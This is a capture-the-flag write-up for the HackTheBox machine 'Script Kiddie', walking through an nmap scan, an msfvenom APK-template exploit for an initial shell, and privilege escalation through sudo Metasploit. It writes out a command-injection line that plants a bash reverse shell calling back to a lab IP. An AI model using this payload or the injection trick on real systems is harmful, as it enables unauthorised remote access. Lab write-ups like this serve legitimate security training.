CTF-Writeups/HackTheBox/Script_Kiddie.md
2021-03-03 02:20:52 +05:00

3.3 KiB

HackTheBox-Script Kiddie

NMAP

Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-02 19:59 PKT
Stats: 0:00:17 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.63% done; ETC: 19:59 (0:00:00 remaining)
Nmap scan report for 10.10.10.226
Host is up (0.21s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
4444/tcp open  krb524?
| fingerprint-strings:
|   GetRequest, NULL:
|     eNrsvWmXIjmSKPo9fwVddXsCiqhgc3AnTmXNEOz7vmbncHwDHHwB31i66/32J/kq34DIqntn7pmbfboCl0wmk8lkMkkm089/S2mKnKI4MXW8qjtJ/MIJR0lWYyCFVGiOs79piWHt35Ji/z
rypLqRZMH+lkmRkdwvp4TC8iytOl8SfWDdL1XWkDyNOsoSzSpOHcrV+anuZJZkOHHrJ
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.45 seconds

PORT 5000 (HTTP)

Here we can do an nmap scan on the machine but if we try to run bash commands it won't work

Similarly with the msfvenom and searchsploit

Msfvenom successfully generetes payload

But only windows and android payload generates

Also there weren't any hidden directories or files on the webserver this page was only there on the machine. So on googling a little bit I found that msfvenom recently had a vulnerability in the process generating payload

This was a latest exploit so metasploit needs to be update if you run to any issues when updating metasploit regarding the gem file do this inorder

gem update cd /usr/share/metasploit-framework sudo nano Gemfile.lock (update reline version in that file this important before bundle install)
sudo bundle install ( in metasploit folder)

Upload the apk file on the website

And you'll get a shell so we will need to stabilize it

Going to pwn's home directory we see a bash script scanlosers.sh which was reading a script file from kid's home directory and execute it

Seeing that file belongs to pwn's group

We can edit this with a bash reverse shell , this is the way the payload needs to be crafted.

echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.126/1337 0>&1' #" >> hackers

Doing sudo -l

Running metasploit as sudo

We can now run commands as root